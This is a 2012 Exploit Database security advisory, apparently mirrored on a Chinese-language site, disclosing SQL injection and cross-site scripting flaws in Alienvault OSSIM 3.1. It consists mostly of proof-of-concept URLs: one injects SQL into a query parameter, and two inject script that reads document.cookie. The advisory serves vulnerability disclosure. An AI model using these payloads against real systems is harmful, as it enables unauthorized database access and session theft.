Alienvault Open Source SIEM (OSSIM) 3.1 – Multiple Vulnerabilities

• Exploit Database
• 9 阅读

• 作者： Stefan Schurtz
  日期： 2012-04-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18800/

• #####################################################################################
  # Advisory: Alienvault OSSIM Open Source SIEM 3.1 Multiple security vulnerabilities
  # Advisory ID: SSCHADV-EDB-2012-001
  # Contact: sschurtz@darksecurity.de
  # Author: Stefan Schurtz
  # Affected Software: Successfully tested on Alienvault Open Source SIEM 3.1 (32bit)
  # Vendor URL: http://www.alienvault.com/
  # Vendor Status: informed
  #####################################################################################
  
  ==========================
  Vulnerability Description
  ==========================
  
  Alienvault OSSIM Open Source SIEM 3.1 is prone to XSS and SQL-Injection vulnerabilities
  
  ==================
  PoC-Exploit
  ==================
  
  #### SQL-Injection //Authentication is needed ####
  https://[target]/ossim/forensics/base_qry_main.php?clear_allcriteria=1&num_result_rows=-1&submit=Query+DB¤t_view=-1&sort_order=time_d&time[0][0]=1=1) LIMIT 1--+&time[0][1]=%3E=&time[0][2]=04&time[0][3]=24&time[0][4]=2012&time[0][5]=3&time[0][6]=3&time[0][7]=3&time[0][8]=+&time[0][9]=+&time_range=today&hmenu=Forensics&smenu=Forensics
  
  #### XSS ####
  https://[target]/ossim/top.php?option=3&soption=3&url='"</script><script>alert(document.cookie)</script>
  
  #### XSS ####
  https://[target]/ossim/forensics/base_qry_main.php?clear_allcriteria=1&num_result_rows=-1&submit=Query+DB¤t_view=-1&sort_order=time_d&time[0][0]=<script>alert(document.cookie)</script>&time[0][1]=%3E=&time[0][2]=04&time[0][3]=24&time[0][4]=2012&time[0][5]=3&time[0][6]=3&time[0][7]=3&time[0][8]=+&time[0][9]=+&time_range=today&hmenu=Forensics&smenu=Forensics